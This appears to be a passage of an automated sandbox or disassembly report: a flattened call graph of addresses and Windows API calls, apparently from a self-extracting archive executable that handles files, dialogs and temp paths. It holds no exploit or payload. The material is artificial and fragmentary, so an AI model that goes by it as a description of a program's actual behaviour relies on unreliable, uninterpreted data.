___delayLoadHelper2@8 5 API calls 23249 fee0e6 23247->23249 23248->23247 23249->23218 23250 ff7769 23249->23250 23251 ff7798 23250->23251 23252 fee203 ___delayLoadHelper2@8 5 API calls 23251->23252 23253 ff77c1 23252->23253 23253->23219 23379 fee920 23254->23379 23257 fee172 23258 ff7716 23257->23258 23381 ffa7b3 23258->23381 23260 ff771f 23261 fee17b 23260->23261 23385 ffab3e 38 API calls 23260->23385 23263 fecbb8 23261->23263 23506 fdfd49 23263->23506 23267 fecbd7 23555 fe9aa0 23267->23555 23269 fecbe0 23559 fe1017 GetCPInfo 23269->23559 23271 fecbea ___scrt_fastfail 23272 fecbfd GetCommandLineW 23271->23272 23273 fecc0c 23272->23273 23274 fecc8a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23272->23274 23562 feb356 23273->23562 23275 fd3e41 _swprintf 51 API calls 23274->23275 23277 feccf3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23275->23277 23573 fea4f8 LoadBitmapW 23277->23573 23280 fecc1a OpenFileMappingW 23284 fecc7a CloseHandle 23280->23284 23285 fecc33 MapViewOfFile 23280->23285 23281 fecc84 23567 fec891 23281->23567 23284->23274 23287 fecc44 __vswprintf_c_l 23285->23287 23288 fecc71 UnmapViewOfFile 23285->23288 23292 fec891 2 API calls 23287->23292 23288->23284 23294 fecc60 23292->23294 23293 fe83fc 8 API calls 23295 fecd4c DialogBoxParamW 23293->23295 23294->23288 23296 fecd86 23295->23296 23297 fecd9f 23296->23297 23298 fecd98 Sleep 23296->23298 23301 fecdad 23297->23301 23600 fe9ca1 23297->23600 23298->23297 23300 fecdcc DeleteObject 23302 fecde6 23300->23302 23303 fecde3 DeleteObject 23300->23303 23301->23300 23304 fece29 23302->23304 23305 fece17 23302->23305 23303->23302 23608 fe9b08 23304->23608 23306 fec8f0 3 API calls 23305->23306 23307 fece1d CloseHandle 23306->23307 23307->23304 23309 fece63 23310 ff6b34 GetModuleHandleW 23309->23310 23311 fee18e 23310->23311 23311->23230 23312 ff6c5d 23311->23312 23808 ff69da 23312->23808 23315->23212 23316->23226 23317->23232 23318->23218 23319->23238 23321 ff15eb ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23320->23321 23333 ff268e 23321->23333 23324 ff15f9 23324->23240 23326 ff1601 23327 ff160c 23326->23327 23347 ff26ca DeleteCriticalSection 23326->23347 23327->23240 23375 ffacbc 23329->23375 23332 ff160f 8 API calls 3 library calls 23332->23241 23334 ff2697 23333->23334 23336 ff26c0 23334->23336 23337 ff15f5 23334->23337 23348 ff2905 23334->23348 23353 ff26ca DeleteCriticalSection 23336->23353 23337->23324 23339 ff1726 23337->23339 23368 ff281a 23339->23368 23341 ff1730 23342 ff173b 23341->23342 23373 ff28c8 6 API calls try_get_function 23341->23373 23342->23326 23344 ff1749 23345 ff1756 23344->23345 23374 ff1759 6 API calls ___vcrt_FlsFree 23344->23374 23345->23326 23347->23324 23354 ff26f9 23348->23354 23351 ff293c InitializeCriticalSectionAndSpinCount 23352 ff2928 23351->23352 23352->23334 23353->23337 23355 ff272d 23354->23355 23356 ff2729 23354->23356 23355->23351 23355->23352 23356->23355 23357 ff274d 23356->23357 23361 ff2799 23356->23361 23357->23355 23359 ff2759 GetProcAddress 23357->23359 23360 ff2769 __crt_fast_encode_pointer 23359->23360 23360->23355 23362 ff27b6 23361->23362 23363 ff27c1 LoadLibraryExW 23361->23363 23362->23356 23364 ff27dd GetLastError 23363->23364 23365 ff27f5 23363->23365 23364->23365 23367 ff27e8 LoadLibraryExW 23364->23367 23365->23362 23366 ff280c FreeLibrary 23365->23366 23366->23362 23367->23365 23369 ff26f9 try_get_function 5 API calls 23368->23369 23370 ff2834 23369->23370 23371 ff284c TlsAlloc 23370->23371 23372 ff283d 23370->23372 23372->23341 23373->23344 23374->23342 23378 ffacd5 23375->23378 23376 fee203 ___delayLoadHelper2@8 5 API calls 23377 fedbcd 23376->23377 23377->23244 23377->23332 23378->23376 23380 fee623 GetStartupInfoW 23379->23380 23380->23257 23382 ffa7c5 23381->23382 23383 ffa7bc 23381->23383 23382->23260 23386 ffa6b2 23383->23386 23385->23260 23387 ff8516 _unexpected 38 API calls 23386->23387 23388 ffa6bf 23387->23388 23406 ffa7d1 23388->23406 23390 ffa6c7 23415 ffa446 23390->23415 23393 ffa6de 23393->23382 23394 ff7a8a __onexit 21 API calls 23395 ffa6ef 23394->23395 23396 ffa721 23395->23396 23422 ffa873 23395->23422 23399 ff7a50 _free 20 API calls 23396->23399 23399->23393 23400 ffa71c 23432 ff7ecc 20 API calls _abort 23400->23432 23402 ffa765 23402->23396 23433 ffa31c 26 API calls 23402->23433 23403 ffa739 23403->23402 23404 ff7a50 _free 20 API calls 23403->23404 23404->23402 23407 ffa7dd ___DestructExceptionObject 23406->23407 23408 ff8516 _unexpected 38 API calls 23407->23408 23413 ffa7e7 23408->23413 23410 ffa86b ___DestructExceptionObject 23410->23390 23413->23410 23414 ff7a50 _free 20 API calls 23413->23414 23434 ff7ad8 38 API calls _abort 23413->23434 23435 ff9931 EnterCriticalSection 23413->23435 23436 ffa862 LeaveCriticalSection _abort 23413->23436 23414->23413 23416 ff3356 __cftof 38 API calls 23415->23416 23417 ffa458 23416->23417 23418 ffa479 23417->23418 23419 ffa467 GetOEMCP 23417->23419 23420 ffa490 23418->23420 23421 ffa47e GetACP 23418->23421 23419->23420 23420->23393 23420->23394 23421->23420 23423 ffa446 40 API calls 23422->23423 23424 ffa892 23423->23424 23427 ffa8e3 IsValidCodePage 23424->23427 23429 ffa899 23424->23429 23431 ffa908 ___scrt_fastfail 23424->23431 23425 fee203 ___delayLoadHelper2@8 5 API calls 23426 ffa714 23425->23426 23426->23400 23426->23403 23428 ffa8f5 GetCPInfo 23427->23428 23427->23429 23428->23429 23428->23431 23429->23425 23437 ffa51e GetCPInfo 23431->23437 23432->23396 23433->23396 23435->23413 23436->23413 23442 ffa558 23437->23442 23446 ffa602 23437->23446 23439 fee203 ___delayLoadHelper2@8 5 API calls 23441 ffa6ae 23439->23441 23441->23429 23447 ffb5ea 23442->23447 23445 ff97c2 __vswprintf_c_l 43 API calls 23445->23446 23446->23439 23448 ff3356 __cftof 38 API calls 23447->23448 23449 ffb60a MultiByteToWideChar 23448->23449 23451 ffb648 23449->23451 23459 ffb6e0 23449->23459 23454 ff7a8a __onexit 21 API calls 23451->23454 23456 ffb669 __vsnwprintf_l ___scrt_fastfail 23451->23456 23452 fee203 ___delayLoadHelper2@8 5 API calls 23455 ffa5b9 23452->23455 23453 ffb6da 23466 ff980d 20 API calls _free 23453->23466 23454->23456 23461 ff97c2 23455->23461 23456->23453 23458 ffb6ae MultiByteToWideChar 23456->23458 23458->23453 23460 ffb6ca GetStringTypeW 23458->23460 23459->23452 23460->23453 23462 ff3356 __cftof 38 API calls 23461->23462 23463 ff97d5 23462->23463 23467 ff95a5 23463->23467 23466->23459 23468 ff95c0 __vswprintf_c_l 23467->23468 23469 ff95e6 MultiByteToWideChar 23468->23469 23470 ff979a 23469->23470 23471 ff9610 23469->23471 23472 fee203 ___delayLoadHelper2@8 5 API calls 23470->23472 23474 ff7a8a __onexit 21 API calls 23471->23474 23477 ff9631 __vsnwprintf_l 23471->23477 23473 ff97ad 23472->23473 23473->23445 23474->23477 23475 ff967a MultiByteToWideChar 23476 ff96e6 23475->23476 23478 ff9693 23475->23478 23503 ff980d 20 API calls _free 23476->23503 23477->23475 23477->23476 23494 ff9c64 23478->23494 23482 ff96bd 23482->23476 23485 ff9c64 __vswprintf_c_l 11 API calls 23482->23485 23483 ff96f5 23484 ff7a8a __onexit 21 API calls 23483->23484 23487 ff9716 __vsnwprintf_l 23483->23487 23484->23487 23485->23476 23486 ff978b 23502 ff980d 20 API calls _free 23486->23502 23487->23486 23488 ff9c64 __vswprintf_c_l 11 API calls 23487->23488 23490 ff976a 23488->23490 23490->23486 23491 ff9779 WideCharToMultiByte 23490->23491 23491->23486 23492 ff97b9 23491->23492 23504 ff980d 20 API calls _free 23492->23504 23495 ff9990 _unexpected 5 API calls 23494->23495 23496 ff9c8b 23495->23496 23498 ff9c94 23496->23498 23505 ff9cec 10 API calls 3 library calls 23496->23505 23500 fee203 ___delayLoadHelper2@8 5 API calls 23498->23500 23499 ff9cd4 LCMapStringW 23499->23498 23501 ff96aa 23500->23501 23501->23476 23501->23482 23501->23483 23502->23476 23503->23470 23504->23476 23505->23499 23507 fed940 23506->23507 23508 fdfd53 GetModuleHandleW 23507->23508 23509 fdfd6d GetProcAddress 23508->23509 23510 fdfdbe 23508->23510 23511 fdfd96 GetProcAddress 23509->23511 23512 fdfd86 23509->23512 23513 fe00f3 GetModuleFileNameW 23510->23513 23619 ff6662 42 API calls 2 library calls 23510->23619 23511->23510 23514 fdfda2 23511->23514 23512->23511 23526 fe010e 23513->23526 23514->23510 23516 fe0031 23516->23513 23517 fe003c GetModuleFileNameW CreateFileW 23516->23517 23518 fe006b SetFilePointer 23517->23518 23519 fe00e7 CloseHandle 23517->23519 23518->23519 23520 fe007b ReadFile 23518->23520 23519->23513 23520->23519 23523 fe009a 23520->23523 23523->23519 23525 fdfcfd 2 API calls 23523->23525 23524 fe0143 CompareStringW 23524->23526 23525->23523 23526->23524 23527 fe0179 GetFileAttributesW 23526->23527 23528 fe018d 23526->23528 23610 fda995 23526->23610 23613 fdfcfd 23526->23613 23527->23526 23527->23528 23529 fe019a 23528->23529 23532 fe01cc 23528->23532 23531 fe01b2 GetFileAttributesW 23529->23531 23533 fe01c6 23529->23533 23530 fe02db 23554 fe95f8 GetCurrentDirectoryW 23530->23554 23531->23529 23531->23533 23532->23530 23534 fda995 GetVersionExW 23532->23534 23533->23532 23535 fe01e6 23534->23535 23536 fe01ed 23535->23536 23537 fe0253 23535->23537 23539 fdfcfd 2 API calls 23536->23539 23538 fd3e41 _swprintf 51 API calls 23537->23538 23540 fe027b AllocConsole 23538->23540 23541 fe01f7 23539->23541 23542 fe0288 GetCurrentProcessId AttachConsole 23540->23542 23543 fe02d3 ExitProcess 23540->23543 23544 fdfcfd 2 API calls 23541->23544 23620 ff2b33 23542->23620 23546 fe0201 23544->23546 23547 fdda42 53 API calls 23546->23547 23549 fe021c 23547->23549 23548 fe02a9 GetStdHandle WriteConsoleW Sleep FreeConsole 23548->23543 23550 fd3e41 _swprintf 51 API calls 23549->23550 23551 fe022f 23550->23551 23552 fdda42 53 API calls 23551->23552 23553 fe023e 23552->23553 23553->23543 23554->23267 23556 fdfcfd 2 API calls 23555->23556 23557 fe9ab4 OleInitialize 23556->23557 23558 fe9ad7 GdiplusStartup SHGetMalloc 23557->23558 23558->23269 23560 fe103b IsDBCSLeadByte 23559->23560 23560->23560 23561 fe1053 23560->23561 23561->23271 23563 feb360 23562->23563 23564 feb476 23563->23564 23565 fe1401 CharUpperW 23563->23565 23622 fde90c 23563->23622 23564->23280 23564->23281 23565->23563 23568 fed940 23567->23568 23569 fec89e SetEnvironmentVariableW 23568->23569 23571 fec8c1 23569->23571 23570 fec8e9 23570->23274 23571->23570 23572 fec8dd SetEnvironmentVariableW 23571->23572 23572->23570 23574 fea519 23573->23574 23575 fea522 GetObjectW 23573->23575 23653 fe963a 12 API calls __vswprintf_c_l 23574->23653 23648 fe952a 23575->23648 23578 fea520 23578->23575 23580 fea575 23592 fdcfab 23580->23592 23581 fea555 23655 fe958c GetDC GetDeviceCaps ReleaseDC 23581->23655 23582 fea543 23654 fe963a 12 API calls __vswprintf_c_l 23582->23654 23585 fea54a 23585->23581 23588 fea550 DeleteObject 23585->23588 23586 fea55d 23656 fe9549 GetDC GetDeviceCaps ReleaseDC 23586->23656 23588->23581 23589 fea566 23657 fe975d 8 API calls ___scrt_fastfail 23589->23657 23591 fea56d DeleteObject 23591->23580 23660 fdcfd0 23592->23660 23594 fdcfb7 23700 fdd6c1 GetModuleHandleW FindResourceW 23594->23700 23597 fe83fc 23795 fed82c 23597->23795 23602 fe9cae 23600->23602 23601 fe9d3c 23601->23301 23602->23601 23804 fe1432 23602->23804 23604 fe9cd6 23604->23601 23807 fe9a8d SetCurrentDirectoryW 23604->23807 23606 fe9ce4 ___scrt_fastfail 23607 fe9d18 SHFileOperationW 23606->23607 23607->23601 23609 fe9b2e GdiplusShutdown CoUninitialize 23608->23609 23609->23309 23611 fda9a9 GetVersionExW 23610->23611 23612 fda9e5 23610->23612 23611->23612 23612->23526 23614 fed940 23613->23614 23615 fdfd0a GetSystemDirectoryW 23614->23615 23616 fdfd40 23615->23616 23617 fdfd22 23615->23617 23616->23526 23618 fdfd33 LoadLibraryW 23617->23618 23618->23616 23619->23516 23621 ff2b3b 23620->23621 23621->23548 23621->23621 23623 fde932 23622->23623 23624 fde91b ___scrt_fastfail 23622->23624 23626 fde821 23623->23626 23624->23563 23627 fde832 __vswprintf_c_l 23626->23627 23630 fde862 23627->23630 23631 fde878 23630->23631 23632 fde86e 23630->23632 23634 fde8e2 GetCurrentProcessId 23631->23634 23635 fde898 23631->23635 23640 fde7e3 23632->23640 23639 fde85c 23634->23639 23635->23639 23646 fd6cce 74 API calls __vswprintf_c_l 23635->23646 23637 fde8b3 pre_c_initialization 23647 fd6cc9 RaiseException FindHandler 23637->23647 23639->23624 23641 fde7ec 23640->23641 23645 fde81b 23640->23645 23642 fdfcfd 2 API calls 23641->23642 23643 fde7f6 23642->23643 23644 fde7fc GetProcAddress GetProcAddress 23643->23644 23643->23645 23644->23645 23645->23631 23646->23637 23647->23639 23658 fe9549 GetDC GetDeviceCaps ReleaseDC 23648->23658 23650 fe9531 23651 fe953d 23650->23651 23659 fe958c GetDC GetDeviceCaps ReleaseDC 23650->23659 23651->23580 23651->23581 23651->23582 23653->23578 23654->23585 23655->23586 23656->23589 23657->23591 23658->23650 23659->23651 23661 fdcfde _wcschr __EH_prolog 23660->23661 23662 fdd00d GetModuleFileNameW 23661->23662 23663 fdd03e 23661->23663 23664 fdd027 23662->23664 23702 fd9768 23663->23702 23664->23663 23667 fdd09a 23713 ff5030 26 API calls 3 library calls 23667->23713 23669 fe3393 76 API calls 23671 fdd06e 23669->23671 23671->23667 23671->23669 23695 fdd2ba 23671->23695 23672 fdd0ad 23714 ff5030 26 API calls 3 library calls 23672->23714 23674 fdd1f6 23675 fd9a4c 77 API calls 23674->23675 23674->23695 23678 fdd210 ___std_exception_copy 23675->23678 23679 fd9979 80 API calls 23678->23679 23678->23695 23682 fdd239 ___std_exception_copy 23679->23682 23681 fdd0bf 23681->23674 23681->23695 23715 fd9b57 23681->23715 23730 fd9979 23681->23730 23738 fd9a4c 23681->23738 23682->23695 23697 fdd245 ___std_exception_copy 23682->23697 23743 fe0fde MultiByteToWideChar 23682->23743 23684 fdd3bb 23744 fdcb33 76 API calls 23684->23744 23686 fdd683 23749 fdcb33 76 API calls 23686->23749 23688 fdd673 23688->23594 23689 fdd3fe 23745 ff5030 26 API calls 3 library calls 23689->23745 23691 fdd418 23746 ff5030 26 API calls 3 library calls 23691->23746 23692 fdd3cf 23692->23689 23694 fe3393 76 API calls 23692->23694 23694->23692 23723 fd946e 23695->23723 23696 fe11fa WideCharToMultiByte 23696->23697 23697->23684 23697->23686 23697->23688 23697->23695 23697->23696 23747 fdd9dc 50 API calls __vsnprintf 23697->23747 23748 ff4e71 26 API calls 3 library calls 23697->23748 23701 fdcfbe 23700->23701 23701->23597 23703 fd9772 23702->23703 23704 fd97f1 CreateFileW 23703->23704 23705 fd9811 GetLastError 23704->23705 23711 fd9862 23704->23711 23706 fdb32c 2 API calls 23705->23706 23709 fd9831 23706->23709 23707 fd987f SetFileTime 23708 fd9899 23707->23708 23708->23671 23710 fd9835 CreateFileW GetLastError 23709->23710 23709->23711 23712 fd9859 23710->23712 23711->23707 23711->23708 23712->23711 23713->23672 23714->23681 23716 fd9b7b SetFilePointer 23715->23716 23717 fd9b6a 23715->23717 23718 fd9b99 GetLastError 23716->23718 23721 fd9bb4 23716->23721 23717->23721 23750 fd6de2 75 API calls 23717->23750 23720 fd9ba3 23718->23720 23718->23721 23720->23721 23751 fd6de2 75 API calls 23720->23751 23721->23681 23724 fd9492 23723->23724 23729 fd94a3 23723->23729 23725 fd949e 23724->23725 23726 fd94a5 23724->23726 23724->23729 23752 fd9621 23725->23752 23757 fd94da 23726->23757 23729->23594 23731 fd9990 23730->23731 23733 fd99f1 23731->23733 23734 fd99e3 23731->23734 23736 fd99f3 23731->23736 23772 fd964a 23731->23772 23733->23681 23784 fd6da8 75 API calls 23734->23784 23736->23733 23737 fd964a 5 API calls 23736->23737 23737->23736 23789 fd9903 23738->23789 23740 fd9a77 23740->23681 23743->23697 23744->23692 23745->23691 23746->23695 23747->23697 23748->23697 23749->23688 23750->23716 23751->23721 23753 fd962e 23752->23753 23754 fd962a 23752->23754 23753->23754 23763 fd9e18 23753->23763 23754->23729 23758 fd9504 23757->23758 23759 fd94e6 23757->23759 23760 fd9523 23758->23760 23771 fd6c7b 74 API calls 23758->23771 23759->23758 23761 fd94f2 CloseHandle 23759->23761 23760->23729 23761->23758 23764 fed940 23763->23764 23765 fd9e25 DeleteFileW 23764->23765 23766 fd9e38 23765->23766 23767 fd9648 23765->23767 23768 fdb32c 2 API calls 23766->23768 23767->23729 23769 fd9e4c 23768->23769 23769->23767 23770 fd9e50 DeleteFileW 23769->23770 23770->23767 23771->23760 23773 fd9658 GetStdHandle 23772->23773 23774 fd9663 ReadFile 23772->23774 23773->23774 23775 fd967c 23774->23775 23776 fd969c 23774->23776 23785 fd9745 23775->23785 23776->23731 23778 fd9683 23779 fd96a4 GetLastError 23778->23779 23780 fd96b3 23778->23780 23781 fd9691 23778->23781 23779->23776 23779->23780 23780->23776 23783 fd96c3 GetLastError 23780->23783 23782 fd964a GetFileType 23781->23782 23782->23776 23783->23776 23783->23781 23784->23733 23786 fd974e GetFileType 23785->23786 23787 fd974b 23785->23787 23788 fd975c 23786->23788 23787->23778 23788->23778 23792 fd990f 23789->23792 23793 fd996e 23789->23793 23790 fd9946 SetFilePointer 23791 fd9964 GetLastError 23790->23791 23790->23793 23791->23793 23792->23790 23793->23740 23794 fd6de2 75 API calls 23793->23794 23794->23740 23797 fed831 ___std_exception_copy 23795->23797 23796 fe841b 23796->23293 23797->23796 23801 ff6763 7 API calls 2 library calls 23797->23801 23802 fee2bb RaiseException FindHandler new 23797->23802 23803 fee29e RaiseException Concurrency::cancel_current_task FindHandler 23797->23803 23801->23797 23806 fe143f 23804->23806 23805 fe1472 CompareStringW 23805->23604 23806->23805 23807->23606 23809 ff69e6 _unexpected 23808->23809 23810 ff69fe 23809->23810 23812 ff6b34 _abort GetModuleHandleW 23809->23812 23830 ff9931 EnterCriticalSection 23810->23830 23813 ff69f2 23812->23813 23813->23810 23845 ff6b78 GetModuleHandleExW 23813->23845 23814 ff6aa4 23834 ff6ae4 23814->23834 23817 ff6a06 23817->23814 23819 ff6a7b 23817->23819 23831 ff74e0 23817->23831 23820 ff6a93 23819->23820 23824 ff7769 _abort 5 API calls 23819->23824 23825 ff7769 _abort 5 API calls 23820->23825 23821 ff6aed 23853 1000ec9 5 API calls ___delayLoadHelper2@8 23821->23853 23822 ff6ac1 23837 ff6af3 23822->23837 23824->23820 23825->23814 23830->23817 23854 ff7219 23831->23854 23873 ff9979 LeaveCriticalSection 23834->23873 23836 ff6abd 23836->23821 23836->23822 23874 ff9d6e 23837->23874 23840 ff6b21 23843 ff6b78 _abort 8 API calls 23840->23843 23841 ff6b01 GetPEB 23841->23840 23842 ff6b11 GetCurrentProcess TerminateProcess 23841->23842 23842->23840 23844 ff6b29 ExitProcess 23843->23844 23846 ff6bc5 23845->23846 23847 ff6ba2 GetProcAddress 23845->23847 23848 ff6bcb FreeLibrary 23846->23848 23849 ff6bd4 23846->23849 23850 ff6bb7 23847->23850 23848->23849 23851 fee203 ___delayLoadHelper2@8 5 API calls 23849->23851 23850->23846 23852 ff6bde 23851->23852 23852->23810 23857 ff71c8 23854->23857 23856 ff723d 23856->23819 23858 ff71d4 ___DestructExceptionObject 23857->23858 23865 ff9931 EnterCriticalSection 23858->23865 23860 ff71e2 23866 ff7269 23860->23866 23864 ff7200 ___DestructExceptionObject 23864->23856 23865->23860 23867 ff7289 23866->23867 23870 ff7291 23866->23870 23868 fee203 ___delayLoadHelper2@8 5 API calls 23867->23868 23869 ff71ef 23868->23869 23872 ff720d LeaveCriticalSection _abort 23869->23872 23870->23867 23871 ff7a50 _free 20 API calls 23870->23871 23871->23867 23872->23864 23873->23836 23875 ff9d93 23874->23875 23879 ff9d89 23874->23879 23876 ff9990 _unexpected 5 API calls 23875->23876 23876->23879 23877 fee203 ___delayLoadHelper2@8 5 API calls 23878 ff6afd 23877->23878 23878->23840 23878->23841 23879->23877 23880 fd1092 23885 fd5a1d 23880->23885 23886 fd5a27 __EH_prolog 23885->23886 23892 fdad1b 23886->23892 23888 fd5a33 23898 fd5c12 GetCurrentProcess GetProcessAffinityMask 23888->23898 23893 fdad25 __EH_prolog 23892->23893 23899 fde6f0 80 API calls 23893->23899 23895 fdad37 23900 fdae33 23895->23900 23899->23895 23901 fdae45 ___scrt_fastfail 23900->23901 23904 fe05b4 23901->23904 23907 fe0574 GetCurrentProcess GetProcessAffinityMask 23904->23907 23908 fdadad 23907->23908 23908->23888 24821 fe9b8d 73 API calls 24797 feda82 38 API calls 2 library calls 24732 ffe081 21 API calls __vswprintf_c_l 24710 fd1382 82 API calls 3 library calls 24733 ff1480 6 API calls 4 library calls 24735 fee07f 27 API calls pre_c_initialization 24822 fe877b CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24737 ff6c73 52 API calls 2 library calls 24798 fece71 19 API calls ___delayLoadHelper2@8 24824 ff6f6d 55 API calls _free 24801 1000b96 CloseHandle 24802 ffde64 51 API calls 23130 febb5b 23131 febb64 GetTempPathW 23130->23131 23144 feb51b _wcsrchr 23130->23144 23136 febb84 23131->23136 23133 fec0c4 23134 fd3e41 _swprintf 51 API calls 23134->23136 23135 fd9e6b 4 API calls 23135->23136 23136->23134 23136->23135 23137 febbbb SetDlgItemTextW 23136->23137 23140 febbd9 _wcschr 23137->23140 23137->23144 23139 feb808 SetWindowTextW 23139->23144 23143 febcc5 EndDialog 23140->23143 23140->23144 23143->23144 23144->23133 23144->23139 23145 ff2b5e 22 API calls 23144->23145 23159 feb5ec ___scrt_fastfail 23144->23159 23161 fe1410 CompareStringW 23144->23161 23162 fe95f8 GetCurrentDirectoryW 23144->23162 23163 fda215 7 API calls 23144->23163 23166 fda19e FindClose 23144->23166 23167 fea2ae 76 API calls ___std_exception_copy 23144->23167 23168 fea156 ExpandEnvironmentStringsW 23144->23168 23145->23144 23147 feb5f9 SetFileAttributesW 23149 feb6b4 GetFileAttributesW 23147->23149 23147->23159 23151 feb6c2 DeleteFileW 23149->23151 23149->23159 23151->23159 23153 feb9d2 GetDlgItem SetWindowTextW SendMessageW 23153->23159 23154 fd3e41 _swprintf 51 API calls 23156 feb6f7 GetFileAttributesW 23154->23156 23155 feba14 SendMessageW 23155->23144 23157 feb708 MoveFileW 23156->23157 23156->23159 23158 feb720 MoveFileExW 23157->23158 23157->23159 23158->23159 23159->23144 23159->23147 23159->23153 23159->23154 23159->23155 23160 feb690 SHFileOperationW 23159->23160 23164 fdb1b7 52 API calls 2 library calls 23159->23164 23165 fda215 7 API calls 23159->23165 23160->23149 23161->23144 23162->23144 23163->23144 23164->23159 23165->23159 23166->23144 23167->23144 23168->23144 23169 fecb57 23170 fecb64 23169->23170 23177 fdda42 23170->23177 23173 fd3e41 _swprintf 51 API calls 23174 fecb8a SetDlgItemTextW 23173->23174 23180 fea388 PeekMessageW 23174->23180 23185 fdda70 23177->23185 23181 fea3dc 23180->23181 23182 fea3a3 GetMessageW 23180->23182 23183 fea3c8 TranslateMessage DispatchMessageW 23182->23183 23184 fea3b9 IsDialogMessageW 23182->23184 23183->23181 23184->23181 23184->23183 23191 fdcf19 23185->23191 23188 fdda6d 23188->23173 23189 fdda93 LoadStringW 23189->23188 23190 fddaaa LoadStringW 23189->23190 23190->23188 23196 fdce52 23191->23196 23193 fdcf36 23194 fdcf4b 23193->23194 23204 fdcf57 26 API calls 23193->23204 23194->23188 23194->23189 23197 fdce6d 23196->23197 23203 fdce66 _strncpy 23196->23203 23199 fdce91 23197->23199 23205 fe11fa WideCharToMultiByte 23197->23205 23202 fdcec2 23199->23202 23206 fdd9dc 50 API calls __vsnprintf 23199->23206 23207 ff4e71 26 API calls 3 library calls 23202->23207 23203->23193 23204->23194 23205->23199 23206->23202 23207->23203 24803 fd1e54 128 API calls __EH_prolog 24828 ffab56 GetCommandLineA GetCommandLineW 24740 fd1050 82 API calls pre_c_initialization 24765 feb51b 109 API calls 4 library calls 24831 fd5f46 80 API calls 22810 fed23e 22811 fed20f 22810->22811 22811->22810 22813 fed53a 22811->22813 22841 fed248 22813->22841 22815 fed554 22816 fed5b1 22815->22816 22835 fed5d5 22815->22835 22852 fed4b8 11 API calls 3 library calls 22816->22852 22818 fed5bc RaiseException 22819 fed7aa 22818->22819 22856 fee203 22819->22856 22820 fed64d LoadLibraryExA 22822 fed6ae 22820->22822 22823 fed660 GetLastError 22820->22823 22825 fed6b9 FreeLibrary 22822->22825 22829 fed6c0 22822->22829 22826 fed689 22823->22826 22827 fed673 22823->22827 22824 fed7b9 22824->22811 22825->22829 22853 fed4b8 11 API calls 3 library calls 22826->22853 22827->22822 22827->22826 22828 fed71e GetProcAddress 22830 fed72e GetLastError 22828->22830 22836 fed77c 22828->22836 22829->22828 22829->22836 22833 fed741 22830->22833 22832 fed694 RaiseException 22832->22819 22833->22836 22854 fed4b8 11 API calls 3 library calls 22833->22854 22835->22820 22835->22822 22835->22829 22835->22836 22855 fed4b8 11 API calls 3 library calls 22836->22855 22838 fed762 RaiseException 22839 fed248 ___delayLoadHelper2@8 11 API calls 22838->22839 22840 fed779 22839->22840 22840->22836 22842 fed27a 22841->22842 22843 fed254 22841->22843 22842->22815 22863 fed2f6 8 API calls 2 library calls 22843->22863 22845 fed259 22846 fed275 22845->22846 22864 fed448 VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 22845->22864 22865 fed27b GetModuleHandleW GetProcAddress GetProcAddress 22846->22865 22849 fed505 22850 fee203 ___delayLoadHelper2@8 5 API calls 22849->22850 22851 fed536 22850->22851 22851->22815 22852->22818 22853->22832 22854->22838 22855->22819 22857 fee20e IsProcessorFeaturePresent 22856->22857 22858 fee20c 22856->22858 22860 fee837 22857->22860 22858->22824 22866 fee7fb SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22860->22866 22862 fee91a 22862->22824 22863->22845 22864->22846 22865->22849 22866->22862 23062 fd9c34 23063 fd9c47 23062->23063 23064 fd9c40 23062->23064 23065 fd9c4d GetStdHandle 23063->23065 23067 fd9c58 23063->23067 23065->23067 23066 fd9cad WriteFile 23066->23067 23067->23064 23067->23066 23068 fd9c7d WriteFile 23067->23068 23069 fd9c78 23067->23069 23071 fd9d20 23067->23071 23073 fd6c55 60 API calls 23067->23073 23068->23067 23068->23069 23069->23067 23069->23068 23074 fd6e9b 75 API calls 23071->23074 23073->23067 23074->23064 24767 fe9135 10 API calls 24805 fef230 51 API calls 2 library calls 24806 fe162f 26 API calls std::bad_exception::bad_exception 24807 feb51b 99 API calls 3 library calls 24768 ffa128 6 API calls ___delayLoadHelper2@8 23108 ff861f 23116 ff9aa7 23108->23116 23111 ff8633 23113 ff863b 23114 ff8648 23113->23114 23124 ff864b 11 API calls 23113->23124 23117 ff9990 _unexpected 5 API calls 23116->23117 23118 ff9ace 23117->23118 23119 ff9ae6 TlsAlloc 23118->23119 23120 ff9ad7 23118->23120 23119->23120 23121 fee203 ___delayLoadHelper2@8 5 API calls 23120->23121 23122 ff8629 23121->23122 23122->23111 23123 ff859a 20 API calls 2 library calls 23122->23123 23123->23113 23124->23111 24771 ff191d 48 API calls 24746 fd1019 29 API calls pre_c_initialization 24773 ff4d18 QueryPerformanceFrequency QueryPerformanceCounter 24809 fd7a13 GetCurrentProcess GetLastError CloseHandle 24838 ff0b11 RaiseException 24747 ff940d 21 API calls 24703 fde708 24704 fde718 24703->24704 24705 fde710 FreeLibrary 24703->24705 24705->24704 24748 fe9404 GdipCloneImage GdipAlloc 24707 fed200 24708 fed1ae 24707->24708 24709 fed53a ___delayLoadHelper2@8 19 API calls 24708->24709 24709->24708

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FDFD49: GetModuleHandleW.KERNEL32 ref: 00FDFD61
                                                                                                                                                                              • Part of subcall function 00FDFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FDFD79
                                                                                                                                                                              • Part of subcall function 00FDFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FDFD9C
                                                                                                                                                                              • Part of subcall function 00FE95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00FE9600
                                                                                                                                                                              • Part of subcall function 00FE9AA0: OleInitialize.OLE32(00000000), ref: 00FE9AB9
                                                                                                                                                                              • Part of subcall function 00FE9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FE9AF0
                                                                                                                                                                              • Part of subcall function 00FE9AA0: SHGetMalloc.SHELL32(010175C0), ref: 00FE9AFA
                                                                                                                                                                              • Part of subcall function 00FE1017: GetCPInfo.KERNEL32(00000000,?), ref: 00FE1028
                                                                                                                                                                              • Part of subcall function 00FE1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 00FE103C
                                                                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00FECC00
